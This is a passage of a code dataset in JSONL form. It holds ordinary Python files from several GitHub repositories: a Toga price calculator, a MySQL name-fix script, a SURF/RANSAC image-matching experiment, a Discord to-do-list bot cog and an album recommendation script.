dPrice_input = toga.TextInput(readonly=True)\n markup_input = toga.TextInput()\n fPrice_input = toga.TextInput(readonly=True)\n GrossProfit_input = toga.TextInput(readonly=True)\n\n msrp_label = toga.Label('MSRP - List Price', style=Pack(text_align=RIGHT))\n discount_label = toga.Label('Discount Percentage', style=Pack(text_align=RIGHT))\n dPrice_label = toga.Label('Discounted sales price', style=Pack(text_align=RIGHT))\n markup_label = toga.Label('Markup Percentage', style=Pack(text_align=RIGHT))\n fPrice_label = toga.Label('Final sales price', style=Pack(text_align=RIGHT))\n GrossProfit_label = toga.Label('Gross Profit', style=Pack(text_align=RIGHT))\n\n def click_calc(widget):\n if msrp_input.value and discount_input.value and markup_input.value:\n try:\n discountPrice = discountit(float(msrp_input.value), float(discount_input.value))\n dPrice_input.value = discountPrice\n markedupPrice, gProfit = markitup(float(discountPrice), markup_input.value)\n fPrice_input.value = markedupPrice\n GrossProfit_input.value = gProfit\n except:\n dPrice_input.value = '????'\n fPrice_input.value = '????'\n GrossProfit_input.value = '????'\n elif msrp_input.value and discount_input.value:\n try:\n discountPrice = discountit(float(msrp_input.value), float(discount_input.value))\n dPrice_input.value = discountPrice\n fPrice_input.value = 'N/A'\n GrossProfit_input.value = 'N/A'\n except:\n dPrice_input.value = '????'\n fPrice_input.value = '????'\n GrossProfit_input.value = '????'\n else:\n pass\n\n calc_button = toga.Button('Calculate', on_press=click_calc)\n\n msrp_box.add(msrp_label)\n msrp_box.add(msrp_input)\n\n discount_box.add(discount_label)\n discount_box.add(discount_input)\n\n dPrice_box.add(dPrice_label)\n dPrice_box.add(dPrice_input)\n\n markup_box.add(markup_label)\n markup_box.add(markup_input)\n\n fPrice_box.add(fPrice_label)\n fPrice_box.add(fPrice_input)\n\n GrossProfit_box.add(GrossProfit_label)\n GrossProfit_box.add(GrossProfit_input)\n\n box.add(msrp_box)\n box.add(discount_box)\n box.add(dPrice_box)\n box.add(markup_box)\n box.add(fPrice_box)\n box.add(GrossProfit_box)\n box.add(calc_button)\n\n box.style.update(direction=COLUMN, padding_top=10)\n msrp_box.style.update(direction=ROW, padding=5)\n discount_box.style.update(direction=ROW, padding=5)\n dPrice_box.style.update(direction=ROW, padding=5)\n markup_box.style.update(direction=ROW, padding=5)\n fPrice_box.style.update(direction=ROW, padding=5)\n GrossProfit_box.style.update(direction=ROW, padding=5)\n\n msrp_input.style.update(flex=1, padding_right=60)\n discount_input.style.update(flex=1, padding_right=60)\n dPrice_input.style.update(flex=1, padding_right=60)\n markup_input.style.update(flex=1, padding_right=60)\n fPrice_input.style.update(flex=1, padding_right=60)\n GrossProfit_input.style.update(flex=1, padding_right=60)\n\n msrp_label.style.update(width=200, padding_right=10)\n discount_label.style.update(width=200, padding_right=10)\n dPrice_label.style.update(width=200, padding_right=10)\n markup_label.style.update(width=200, padding_right=10)\n fPrice_label.style.update(width=200, padding_right=10)\n GrossProfit_label.style.update(width=200, padding_right=10)\n\n calc_button.style.update(padding=10, width=100)\n\n return box\n\n\n\ndef main():\n return toga.App('GP Calculator', 'org.stpricsdahc.GPCalc', startup=build)\n\nif __name__ == '__main__':\n main().main_loop()\n","repo_name":"StpircsDahc/First-Toga-App","sub_path":"toga_QuickGP.py3.py","file_name":"toga_QuickGP.py3.py","file_ext":"py","file_size_in_byte":4637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23079986076","text":"import pymysql\nfrom pymysql.cursors import DictCursor\nfrom Config.settings import attr_merge_conf\n\nTASK_TABLE = 'chat_attraction_new'\n\n\ndef name_problem():\n conn = pymysql.connect(**attr_merge_conf)\n cursor = conn.cursor(cursor=DictCursor)\n sql = 'select id,name,name_en from {0}'.format(TASK_TABLE)\n cursor.execute(sql)\n datas = []\n for line in cursor.fetchall():\n miaoji_id = line['id']\n name = line['name']\n name_en = line['name_en']\n if name == '':\n name = name_en\n datas.append((name, miaoji_id))\n return update_db(datas)\n\n\ndef update_db(args):\n conn = pymysql.connect(**attr_merge_conf)\n cursor = conn.cursor()\n sql = 'update {0} set name=%s where id=%s'.format(TASK_TABLE)\n res = cursor.executemany(sql, args)\n conn.close()\n return res\n\n\nif __name__ == '__main__':\n print(name_problem())\n","repo_name":"20113261/p_m","sub_path":"data_clean/attr_add_name.py","file_name":"attr_add_name.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24972105288","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport sys , os , random\nimport cv, cv2\nimport numpy as np\nfrom numpy.lib.stride_tricks import as_strided\n \nSURF_THRESHOLD = 1000\nSURF_MATCH_THRESHOLD = 0.3\n \nINLIER_DISTANCE_THRESHOLD = 30\nNUMBER_OF_INLIERS_THRESHOLD = 0.8\n \n \n \ndef SURFdetector ( image ):\n\tglobal SURF_THRESHOLD\n\tdetector = cv2.SURF(SURF_THRESHOLD, 10, 10)\n\tkeypoints, descriptors = detector.detectAndCompute(image, None)\n\treturn keypoints, descriptors\n \ndef SURFmatcher(keypoints_set , descriptors_set):\n\tkeypoint_1 = keypoints_set[0]\n\tkeypoint_2 = keypoints_set[1]\n\tdescriptor_1 = descriptors_set[0]\n\tdescriptor_2 = descriptors_set[1]\n \n\tdiff = descriptor_2 - descriptor_1[:,None]\n\tsqure_of_diff = diff ** 2\n\tsum_square_diff = squre_of_diff.sum(axis=-1)\n\tscore = np.sqrt(sum_square_diff.min(axis=-1))\n\tmatches = np.argmin(sum_square_diff,axis=-1)\n\tinvalid_matches = score > SURF_MATCH_THRESHOLD \n\t\n\tscore[invalid_matches] = -1\n\tmatches[invalid_matches] = -1\n \n\treturn matches , score\n \ndef correspondace_map(features_1, features_2, matches):\n\t\n\tdef feature_to_point(keypoint):\n\t\tx,y = keypoint.pt\n\t\treturn x , y\n \n\tvalid_matches_bool = matches != -1\n\tvalid_matches = matches[valid_matches_bool]\n\tfeature_to_array = np.vectorize(feature_to_point)\n \n\tfeatures1 = (np.asarray(feature_to_array(features_1))).T\n\tfeatures2 = (np.asarray(feature_to_array(features_2))).T\n \n\tvalid_features1 = features1[valid_matches_bool]\n\tvalid_features2 = features2[valid_matches,:]\n \n\tcorrespondace = np.hstack((valid_features1, valid_features2))\n\treturn correspondace\n \ndef HomograpgyCalculation(correspondace, for_ransac=True):\n\t\n\tdef Making_A(point):\n\t\tx,y,x1,y1 = point.item(0), point.item(1), point.item(2), point.item(3)\n\t\treturn x,y,1,0,0,0,-(x*x1),-(x1*y),0,0,0,x,y,1,-(x*y1),-(y*y1)\n\t\n\tdesired_correspondaces = 0\n\tif for_ransac == True:\n\t\trandom_indices = np.array(random.sample(range(correspondace.shape[0]), 8))\n\t\tdesired_correspondaces = correspondace[random_indices,:]\n\telse :\n\t\tdesired_correspondaces = correspondace\n \n\t#print desired_correspondaces.shape\n \n\tB = desired_correspondaces[:,2:4].flatten()\n\tA = np.apply_along_axis(Making_A,1,desired_correspondaces).reshape(-1,8)\n \n \n\t#Computing over determined solution using psudo inverse of A\n\tA_psudo_inverse = np.dot ( np.linalg.inv( np.dot ( A.T , A ) ) , A.T )\n\tx = np.dot ( A_psudo_inverse , B )\n \n\tH = (np.append(x,1)).reshape(3,3)\n\t\n\treturn H\n \ndef RANSAC ( features_set, matches, H ):\n\t\t\n\tfeatures1 = features_set[0]\n\tfeatures2 = features_set[1]\n\t\n\tcorrespondace = correspondace_map(features1 , features2 , matches)\n\tnumber_of_correspondences = correspondace.shape[0]\n \n\tinlier_set = 0\n\toutliers = 0\n\tbest_inliers = 0\n\t\n\ttrials = 0\n\tN = 1e3\n\tmax_inliers = 10\n\tmin_variance = 1e10\n \n\twhile trials < N :\n \n\t\ttemp_H = HomograpgyCalculation(correspondace)\n \n\t\tcorrespondace_img1 = correspondace[:,0:2]\n\t\tcorrespondace_img2 = correspondace[:,2:4]\n \n\t\t#padding one at the end\n\t\tcorrespondace_img = np.ones((correspondace_img1.shape[0],correspondace_img1.shape[1]+1))\n\t\tcorrespondace_img[:,:-1] = correspondace_img1\n\t\t#multiplying with temp \n\t\tcorrespondace_mul_H = np.dot(temp_H,correspondace_img.T).T\n\t\tcorrespondace_H = (np.divide(correspondace_mul_H[:,0:2].T,correspondace_mul_H[:,2])).T\n \n\t\t#print np.dot(H,correspondace_img.T),T\n\t\tdiff = correspondace_img2 - correspondace_H\n\t\t#print diff\n\t\terror = (((diff[:,0]**2) + (diff[:,1]**2))**0.5)\n \n\t\tinlier_indices = error < INLIER_DISTANCE_THRESHOLD\n\t\tinlier_set = correspondace[inlier_indices,:]\n\t\tnumber_of_inliers = inlier_set.shape[0] \n \n\t\t#print number_of_inliers\n \n\t\tif number_of_inliers > max_inliers :\n\t\t\terror_mean = (error.sum(axis=-1))/number_of_inliers\n\t\t\tvariance = ((error**2).sum(axis=-1)) - error_mean\n\t\t\tif variance < min_variance :\n\t\t\t\tmax_inliers = number_of_inliers\n\t\t\t\tmin_variance = variance\n\t\t\t\tH = temp_H\n\t\t\t\tbest_inliers = inlier_set\n\t\t\t\toutliers_indices = np.logical_not(inlier_indices)\n\t\t\t\toutliers = correspondace[outliers_indices,:]\n \n\t\t#Update N and no of trials\n\t\ttrials +=1 \n \n\t\tif number_of_inliers > 0 :\n\t\t\te = 1.0 - float ( number_of_inliers )/ float ( number_of_correspondences )\n\t\t\te_1 = 1.0 - e\n\t\t\tif e_1 == 1:\n\t\t\t\tbreak\n\t\t\tif np . log (1.0 - e_1 * e_1 * e_1 * e_1 * e_1 * e_1 * e_1 * e_1 ) !=0:\n\t\t\t\tN = int (np. log (1.0-0.99) /np . log (1.0- e_1 * e_1 * e_1 * e_1 * e_1 * e_1 * e_1 * e_1 ) )\t\t\n \n\t\tif float ( number_of_inliers ) / float ( number_of_correspondences ) < NUMBER_OF_INLIERS_THRESHOLD \\\n\t\t\tand trials > N:\n\t\t\ttrials = 1\n \n \n\t#print H\n\t#print correspondace\n\t#print best_inliers\n \n\tHomograpgy_best_inliers = HomograpgyCalculation(best_inliers,for_ransac = False)\n \n\treturn best_inliers, outliers, Homograpgy_best_inliers\n \n \ndef main ( ) :\n \n\timage =[]\n\tkeypoints_set = []\n\tdescriptors_set = []\n\tH = 0\n \n\t#loading images\n\tfor i in range (len ( sys . argv ) - 1 ):\n\t\tfilename = sys . argv [ i + 1 ]\n\t\timage.append(cv2.imread (filename))\n \n\twidth = image[0].shape[1]\n\theight = image[0].shape[0]\n \n\tsurf_features = np.zeros((height , len(image)*width ,3) ,np.uint8)\n\tsurf_matches = np.zeros((height , len(image)*width ,3) ,np.uint8)\n\t\n\tfor i in range(len(image)):\n \n\t\tkeypoints, descriptors = SURFdetector( image[i])\n\t\t\n\t\tkeypoints_set.append(keypoints)\n\t\tdescriptors_set.append(descriptors)\n \n\t\tsurf_features[0:height , i*width : (i + 1)*width , :] = image[i]\n\t\n\t\tfor j in range ( len ( keypoints ) ) :\n\t\t\tx , y = keypoints[j].pt\n\t\t\tcv2.circle ( surf_features , ( (i*width) + int (x) , int (y) ) , 0 , (255 , 0 , 0) , 4)\n\t\n\tcv2.imwrite('surf_features.png', surf_features)\n\t\n\tsurf_best_inliers = surf_features\n\toutliers_image = surf_features\n \n\tmatches, score = SURFmatcher(keypoints_set,descriptors_set)\n\tbest_inliers, outliers, Homograpgy_best_inliers = RANSAC(keypoints_set, matches, H)\n\t\n \n \n\t\n\tfor i in range ( len ( best_inliers ) ) :\n\t\tcv2.line (surf_best_inliers , ((int(best_inliers[i][0])) , (int(best_inliers[i][1]))), \\\n\t\t\t\t((int(best_inliers[i][2]))+width , (int(best_inliers[i][3]))), \\\n\t\t\t\t(255*( i%4) ,255*(( i+1)%4) , 255*(( i+2)%4) ) , 1 , cv2.CV_AA, 0)\n \n\tcv2.imwrite('surf_best_inliers.png', surf_best_inliers)\n \n\tfor i in range ( len ( outliers ) ) :\n\t\tcv2.line (outliers_image , ((int(outliers[i][0])) , (int(best_inliers[i][1]))), \\\n\t\t\t\t((int(outliers[i][2]))+width , (int(outliers[i][3]))), \\\n\t\t\t\t(255 ,255 , 255 ) , 1 , cv2.CV_AA, 0)\n\t\n\tcv2.imwrite('surf_outliers.png', outliers_image)\n \n \nmain()\n","repo_name":"eshafeeqe/Computer-Vision-Experiments","sub_path":"surf_ransac.py","file_name":"surf_ransac.py","file_ext":"py","file_size_in_byte":6385,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"13657803825","text":"import discord\nfrom discord.ext import commands\nimport asyncio\nimport random \nfrom .ShowCommands import *\n\nclass ModificationCommands(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n\n ''' Commands '''\n\n @commands.command(aliases=['c'], case_insensitive=True)\n async def create(self, ctx, liste=None, *members: discord.Member):\n if not liste:\n await ctx.send(\"Please enter the liste name you want to create\")\n return\n \n #check if the list exists\n l_exists = await self.check_liste(ctx.author.id, liste) #if liste exists return id_liste\n if l_exists:\n await ctx.send(\"You already have a liste named {}\".format(liste))\n return\n\n #check if the main user exists\n user = await self.check_user(ctx.author)\n\n #set the mode\n party = False\n mode = False\n if not len(members) == 0:\n party=True\n #give permissions to members\n await ctx.send(\"Do you want the party member to be able to modify the party liste {} ? y or n \".format(liste.capitalize()))\n try:\n msg = await self.bot.wait_for(\n \"message\",\n timeout=17,\n check=lambda message: message.author == ctx.author \n and message.channel == ctx.channel\n )\n if msg.content.lower() == \"y\" or msg.content.lower() == \"yes\":\n mode = True #mode true = everyone can modify\n except asyncio.TimeoutError:\n await ctx.send(\"No respond, by default only <@{}> will be able to modify the list\".format(ctx.author.id))\n \n #create liste for all members that can be added\n (msg, not_added_member) = await self.add_members(ctx.author.id, members, liste, ctx.message.id, None)\n await self.create_liste(ctx.author.id, ctx.message.id, liste.lower(), ctx.author.id, mode, party)\n await ctx.send(\"{} \\nParty List {} successfully created! {} users have access\".format(msg, liste.lower(), len(members) + 1 - not_added_member))\n return \n\n #create list for main user\n await self.create_liste(ctx.author.id, ctx.message.id, liste.lower(), ctx.author.id, mode, party)\n\n await ctx.send(\"Liste {} successfully created, let's be productif miaw ;)\".format(liste))\n\n @commands.command(aliases=['j'], case_insensitive=True)\n async def join(self, ctx, liste=None, *members: discord.Member):\n if not liste or len(members) == 0:\n await ctx.send(\"You have to specify an existing liste and at least ping one member to add\")\n return\n\n id_liste = await self.check_liste(ctx.author.id, liste) #checks if a member already has a list with that name\n if not id_liste:\n await ctx.send(\"You have no liste named {}\".format(liste))\n return\n\n await self.bot.con.execute(\"UPDATE listes SET party=True WHERE id_liste=$1\", id_liste)\n (msg, not_added_member) = await self.add_members(ctx.author.id, members, liste, id_liste, None)\n\n await ctx.send(\"{} \\nParty List {} successfully updated! {} users added\".format(msg, liste.lower(), len(members) - not_added_member))\n\n @commands.command(aliases=['a'], case_insensitive=True)\n async def add(self, ctx, task=None, liste=None):\n if(task == None or liste == None):\n await ctx.send('Please write the commands as such :\\n !add \"task_name\" \"list_name\"')\n return\n liste = liste.lower()\n task = task.lower()\n \n user = await self.check_user(ctx.author)\n\n id_liste = await self.bot.con.fetchval(\"SELECT id_liste FROM main WHERE id_user=$1 AND l_name=$2\", ctx.author.id, liste.lower())\n\n #check if rights ok\n if not await self.check_rights(ctx, id_liste):\n await ShowCommands.show(self, ctx, liste)\n return \n\n #if not id_liste for user, don't add task\n if not id_liste:\n await ctx.send(\"List {} doesn't exist, type !create {} to create the list.\".format(liste, liste))\n return\n\n t_exists = await self.bot.con.fetch(\"SELECT id_task FROM main WHERE id_user=$1 AND l_name=$2 AND t_name=$3\", ctx.author.id, liste.lower(), task.lower())\n\n if t_exists:\n await ctx.send(\"Task {} already exists in {}\".format(task,liste)) \n return\n\n #add task to existing list\n await self.add_task(ctx.author.id, liste, ctx.message.id, task)\n await ctx.send('{} successfully added to {} !'.format(task, liste))\n await ShowCommands.show(self, ctx, liste)\n \n @commands.command(aliases=[\"remove\", \"del\"], case_insensitive=True)\n async def delete(self, ctx, task=None, liste=None):\n if not task:\n await ctx.send(\"Enter the task, list you want to remove\")\n return\n\n if not liste:\n substitue = task\n else:\n substitue = liste\n\n id_liste = await self.bot.con.fetchval(\"SELECT id_liste FROM main WHERE id_user=$1 AND l_name=$2\", ctx.author.id, substitue.lower())\n if not id_liste:\n await ctx.send(\" You have no liste named: {} \".format(substitue))\n return\n\n if not await self.check_rights(ctx, id_liste):\n await ShowCommands.show(self, ctx, substitue)\n return\n\n if not liste:\n liste = task\n await ctx.send(\"Are you sure you want to remove the entire {} liste ? type y or n\".format(liste))\n try:\n msg = await self.bot.wait_for(\n \"message\",\n timeout=17,\n check=lambda message: message.author == ctx.author \n and message.channel == ctx.channel\n )\n if msg.content.lower() == \"y\" or msg.content.lower() == \"yes\":\n await self.delete_liste(ctx, id_liste, ctx.author.id, liste) #Give Directly ID LIST\n return\n\n await ctx.send(\"{} has not been deleted\".format(liste))\n\n except asyncio.TimeoutError:\n await ctx.send(\"{} has not been deleted\".format(liste))\n return\n\n id_task = await self.bot.con.fetchval(\"SELECT id_task FROM main WHERE id_liste=$1 AND t_name=$2\", id_liste, task.lower())\n if not id_task:\n await ctx.send(\" You have no task named: {} \".format(task))\n return\n\n await self.delete_task(id_task, id_liste)\n await ctx.send(\"{} successfully deleted\".format(task))\n await ShowCommands.show(self, ctx, liste)\n\n @commands.command(aliases=[\"achieved\", \"finished\"], case_insensitive=True)\n async def done(self, ctx, task=None, liste=None):\n if not liste or not task:\n await ctx.send(\"Please specify the task you achieved\\n Enter: $done [liste name] [task name]\")\n return\n \n id_liste = await self.bot.con.fetchval(\"SELECT id_liste FROM main WHERE id_user=$1 AND l_name=$2\", ctx.author.id, liste.lower())\n if not await self.check_rights(ctx, id_liste):\n await ShowCommands.show(self, ctx, liste)\n return\n\n #set task to achieved\n stat_task = await self.check_task(id_liste, task)\n\n if stat_task and not stat_task[1]:\n await self.update_task(id_liste,stat_task[0])\n embed = discord.Embed(\n title=\"Congratulation on achieving your task :partying_face:\",\n color=random.randint(0, 0xffffff)\n )\n embed.set_image(url=\"https://media1.tenor.com/images/4598a55e2ed5c0f8a0d7680695f6c7a1/tenor.gif\")\n await ctx.send(embed=embed)\n await ShowCommands.show(self, ctx, liste)\n return\n\n if stat_task:\n await ctx.send(\"Task already achieved\")\n return\n\n await ctx.send(\"Task doesn't exist\")\n\n ''' Methods '''\n async def check_rights(self, ctx, id_liste):\n admin = await self.bot.con.fetchval(\"SELECT admin FROM listes WHERE id_liste=$1\", id_liste)\n mode = await self.bot.con.fetchval(\"SELECT mode FROM listes WHERE id_liste=$1\", id_liste)\n party = await self.bot.con.fetchval(\"SELECT party FROM listes WHERE id_liste=$1\", id_liste)\n\n if mode or admin == ctx.author.id or not party:\n return True\n \n await ctx.send(\"You don't have the rights to modify that list\")\n return False\n\n async def check_user(self, author):\n user = await self.bot.con.fetch(\"SELECT * FROM users WHERE id_user=$1\", author.id)\n await self.welcome(user, author)\n\n #if not user create a new user\n if not user:\n await self.bot.con.execute(\"INSERT INTO users (id_user, nb_tasks, nb_lists,nb_achieved) VALUES ($1,0,0,0)\", author.id)\n \n return await self.bot.con.fetchrow(\"SELECT * FROM users WHERE id_user=$1\", author.id)\n\n async def check_liste(self, id, liste):\n return await self.bot.con.fetchval(\"SELECT id_liste FROM main WHERE id_user=$1 AND l_name=$2\", id, liste.lower())\n\n async def check_task(self, id_liste, task):\n return await self.bot.con.fetchrow(\"SELECT id_task, achieved FROM tasks WHERE id_liste=$1 AND t_name=$2\", id_liste, task.lower())\n\n async def update_task(self, id_liste, id_task):\n await self.bot.con.execute(\"UPDATE tasks SET achieved=True WHERE id_task=$1\", id_task)\n\n #update lists stats\n liste_nb_achieved = await self.bot.con.fetchval(\"SELECT nb_achieved FROM listes WHERE id_liste=$1\", id_liste)\n await self.bot.con.execute(\"UPDATE listes SET nb_achieved=$1 WHERE id_liste=$2\", liste_nb_achieved+1, id_liste)\n #update users stats\n users = await self.bot.con.fetch(\"SELECT id_user FROM main WHERE id_liste=$1\", id_liste)\n for id_user in set(users):\n user = await self.bot.con.fetchrow(\"SELECT * FROM users WHERE id_user=$1\", id_user[0])\n await self.bot.con.execute(\"UPDATE users SET nb_achieved=$1 WHERE id_user=$2\", user['nb_achieved']+1, id_user[0])\n\n async def create_liste(self, id_user, id_liste, liste, admin, mode, party):\n #insert list in list\n if id_user == admin:\n await self.bot.con.execute(\"INSERT INTO listes (id_liste, nb_tasks, nb_achieved, l_name, admin, mode, party) VALUES ($1,0,0,$2,$3,$4,$5)\",id_liste,liste.lower(), admin, mode, party)\n liste_el = await self.bot.con.fetchrow(\"SELECT * FROM listes WHERE id_liste=$1\", id_liste) \n #insert liste in main\n await self.bot.con.execute(\"INSERT INTO main (id_user, id_liste, l_name, id_task, t_name) VALUES ($1,$2,$3,NULL,NULL)\",id_user,id_liste,liste.lower())\n\n #upading the user's stats\n user = await self.bot.con.fetchrow(\"SELECT * FROM users WHERE id_user=$1\", id_user)\n \n if liste_el == None:\n await self.bot.con.execute(\"UPDATE users SET nb_lists=$1 WHERE id_user=$2\", user['nb_lists']+1, id_user)\n return\n await self.bot.con.execute(\"UPDATE users SET nb_lists=$1, nb_tasks=$2, nb_achieved=$3 WHERE id_user=$4\", user['nb_lists']+1, user['nb_tasks']+liste_el['nb_tasks'], user['nb_achieved']+liste_el['nb_achieved'], id_user)\n\n async def add_members(self, author, members, liste, id_liste, mode):\n party = True\n not_added_member = 0\n msg = \"\"\n for member in members:\n l_exists_for_member = await self.check_liste(member.id, liste) #checks if a member already has a list with that name returns the id_liste\n if l_exists_for_member:\n msg = msg + \"Member <@{}> already has a list named {}, she/he hasn't been added to the party\\n\".format(member.id, liste.capitalize())\n not_added_member = not_added_member + 1\n elif not author == member.id:\n await self.check_user(member)\n await self.create_liste(member.id, id_liste, liste.lower(), author, mode, party)\n return (msg, not_added_member)\n\n async def add_task(self, id_user, liste, id_task, task):\n \n #find id_liste to udapte mains and liste table#\n id_liste = await self.bot.con.fetchval(\"SELECT id_liste FROM main WHERE id_user=$1 AND l_name=$2\", id_user, liste)\n await self.bot.con.execute(\"INSERT INTO main (id_user, id_liste, l_name, id_task, t_name) VALUES ($1,$2,$3,$4,$5)\",id_user,id_liste,liste.lower(),id_task,task.lower())\n liste = await self.bot.con.fetchrow(\"SELECT * FROM listes WHERE id_liste=$1\", id_liste)\n await self.bot.con.execute(\"UPDATE listes SET nb_tasks=$1 WHERE id_liste=$2\", liste['nb_tasks']+1, id_liste)\n ####\n\n #Insert task\n await self.bot.con.execute(\"INSERT INTO tasks (id_task, id_liste, t_name, important, urgent, achieved) VALUES ($1,$2,$3,False,False,False)\",id_task,id_liste,task.lower())\n\n #IF PARTY LIST UPDATES ALL USERS\n users = await self.bot.con.fetch(\"SELECT id_user FROM main WHERE id_liste=$1\", id_liste)\n for user in set(users):\n #upading the user's stats\n nb_tasks = await self.bot.con.fetchval(\"SELECT nb_tasks FROM users WHERE id_user=$1\", user[0])\n await self.bot.con.execute(\"UPDATE users SET nb_tasks=$1 WHERE id_user=$2\", nb_tasks+1, user[0])\n\n async def delete_liste(self, ctx, id_liste, id_user, liste):\n admin = await self.bot.con.fetchval(\"SELECT admin FROM listes WHERE id_liste=$1\", id_liste)\n if id_user == admin:\n nb_tasks = await self.bot.con.fetchval(\"SELECT nb_tasks FROM listes WHERE id_liste=$1\", id_liste)\n \n #find users_id and upading the users's stats\n id_users = await self.bot.con.fetch(\"SELECT id_user FROM main WHERE id_liste=$1\", id_liste)\n for all_id_user in set(id_users):\n user = await self.bot.con.fetchrow(\"SELECT * FROM users WHERE id_user=$1\", all_id_user[0])\n await self.bot.con.execute(\"UPDATE users SET nb_tasks=$1, nb_lists=$2 WHERE id_user=$3\", user['nb_tasks']-nb_tasks, user['nb_lists']-1, all_id_user[0])\n\n #del listes and tasks from the other tables\n await self.bot.con.execute(\"DELETE FROM listes WHERE id_liste=$1\", id_liste)\n await self.bot.con.execute(\"DELETE FROM main WHERE id_liste=$1\", id_liste)\n await self.bot.con.execute(\"DELETE FROM tasks WHERE id_liste=$1\", id_liste)\n\n await ctx.send(\"{} successfully deleted\".format(liste))\n return\n await ctx.send(\"Only the creator of the liste can delete it.\\n Enter: !leave [liste name] to leave a party liste\")\n\n async def delete_task(self, id_task, id_liste):\n id_users = await self.bot.con.fetch(\"SELECT id_user FROM main WHERE id_liste=$1\", id_liste)\n await self.bot.con.execute(\"DELETE FROM tasks WHERE id_task=$1\", id_task)\n\n #find liste row and upading the liste's stats\n liste_row = await self.bot.con.fetchrow(\"SELECT * FROM listes WHERE id_liste=$1\", id_liste)\n await self.bot.con.execute(\"UPDATE listes SET nb_tasks=$1 WHERE id_liste=$2\", liste_row['nb_tasks']-1, id_liste)\n\n #find user row and upading the user's stats\n for all_id_user in set(id_users):\n user = await self.bot.con.fetchrow(\"SELECT * FROM users WHERE id_user=$1\", all_id_user[0])\n await self.bot.con.execute(\"UPDATE users SET nb_tasks=$1 WHERE id_user=$2\", user['nb_tasks']-1, all_id_user[0])\n\n\n if liste_row['nb_tasks'] <= 1:\n await self.bot.con.execute(\"UPDATE main SET id_task=NULL, t_name=NULL WHERE id_liste=$1\",id_liste)\n return\n\n await self.bot.con.execute(\"DELETE FROM main WHERE id_task=$1\", id_task)\n\n async def welcome(self, user, author):\n #if not in database yet send a Welcome msg\n if not user:\n await author.send(\"Hi it is just to tell you that you can use the BOT per DM if you want to manage your to do lists in a more cozy place ;)\")\n embed = discord.Embed(\n title=\"Shall you have a nice and productive day !\",\n color=random.randint(0, 0xffffff)\n )\n embed.set_image(url=\"https://media1.tenor.com/images/c9e7b31aad80f5dea1eaf363d2c0814d/tenor.gif?itemid=19979337\")\n await author.send(embed=embed)\n\ndef setup(bot):\n bot.add_cog(ModificationCommands(bot))","repo_name":"OtmaniKhaoula/ToDoCat","sub_path":"Cogs/ModificationCommands.py","file_name":"ModificationCommands.py","file_ext":"py","file_size_in_byte":16611,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"25471078697","text":"import copy\nimport os\n\nimport sys\nimport json\n\nfrom db_accessing.VO import Album_VO\nfrom modules.natural_language.NL import NL_processor\nfrom modules.recommendation.similarity_functions import cosine_similarity\n\ndef make_user_interest_vector(user_interests, sample_dict):\n # unique_interests[i] 가 관심사 리스트에 존재한다면 i 번째 요소가 1이고, 존재하지 않으면 0인 벡터를 생성\n return [1 if interest in user_interests else 0\n for interest in sample_dict]\n\n# for i in range(1, lenOfNotNULL, batchsize):\n# for offs in range(1, 10, batchsize):\n\ndir = '__recommand__'\nif not os.path.exists(dir):\n os.mkdir(dir)\n\nlenOfNotNULL = Album_VO.query.filter(Album_VO.Description != None).count()\nprint(lenOfNotNULL, type(lenOfNotNULL))\n\nbatchsize = 200\nrecommend_size = 3\ndef recommended_list_to_json(rec_list):\n fname = '{0}/recommand_album_{1}.json'.format(dir, x[res_i].Album_ID)\n with open(fname, mode='w', encoding='utf8') as f:\n for dict_input in rec_list:\n json.dump(dict_input,fp=f, ensure_ascii=False)\n f.write('\\n')\n\n\nx = Album_VO.query.filter(Album_VO.Description != None).offset(210).limit(batchsize).all()\nfor seg in x:\n print(seg.Album_Title)\n# print(len(x), type(x))\n\nsim_best3 = []\nfor i in range(batchsize):\n print('outerloop count: ', i)\n NLP_noun_count_dict = NL_processor(x[i].Description).noun_count_result\n ht_list = list(NLP_noun_count_dict.keys())\n inner_sim_best3 = []\n for j in range(batchsize):\n\n if i != j:\n inner_ht_list = list(NL_processor(x[j].Description).noun_count_result.keys())\n\n dictionary_set = copy.deepcopy(ht_list)\n dictionary_set.extend(inner_ht_list)\n dictionary_set = list(set(dictionary_set))\n\n # print(\"dict_set : \", dictionary_set)\n\n\n IR_Vector_inner = make_user_interest_vector(inner_ht_list, dictionary_set)\n IR_Vector_outer = make_user_interest_vector(ht_list, dictionary_set)\n # print(IR_Vector_inner)\n # print(IR_Vector_outer)\n sim = cosine_similarity(IR_Vector_inner, IR_Vector_outer)\n # print(sim)\n\n if len(inner_sim_best3) == recommend_size:\n # print('if문', file=sys.stderr)\n for k in range(recommend_size):\n if inner_sim_best3[k][0] < sim:\n inner_sim_best3[k] = [sim, x[j]]\n inner_sim_best3.sort(key = lambda element : element[0])\n break\n # print(inner_sim_best3)\n else:\n # print('else 문', file=sys.stderr)\n inner_sim_best3.append([sim, x[j]])\n inner_sim_best3.sort(key = lambda element : element[0])\n # print(inner_sim_best3)\n\n sim_best3.append(inner_sim_best3)\n # print(inner_sim_best3, file=sys.stderr)\n\nfor res_i in range(batchsize):\n print(x[res_i].Album_Title, \"'s recomend Album is : \\n\\t\")\n rec_list = []\n for i in range(len(sim_best3[res_i])):\n print(\">>> [{0}] {1} : {2} \\n\\t\".format(sim_best3[res_i][i][0], sim_best3[res_i][i][1].Album_ID, sim_best3[res_i][i][1].Album_Title, file=sys.stderr))\n dict_result = {\"ID\": sim_best3[res_i][i][1].Album_ID, \"Title\": sim_best3[res_i][i][1].Album_Title,\"similarity\": sim_best3[res_i][i][0]}\n rec_list.append(dict_result)\n recommended_list_to_json(rec_list)\n\n\n\n\n\n# print('batch : {0}'.format(i/batchsize))\n\n# mat = []\n# for i in range(len(x)):\n# mat.append(NL_processor(x[i].Description).all_count_result)\n# print(mat[i])\n#\n# print()","repo_name":"bitacademy-howl/Music_Recommendation_mod","sub_path":"test_module/data_processing.py","file_name":"data_processing.py","file_ext":"py","file_size_in_byte":3639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1019947101","text":"#!/usr/bin/env python\nimport roslib\nimport 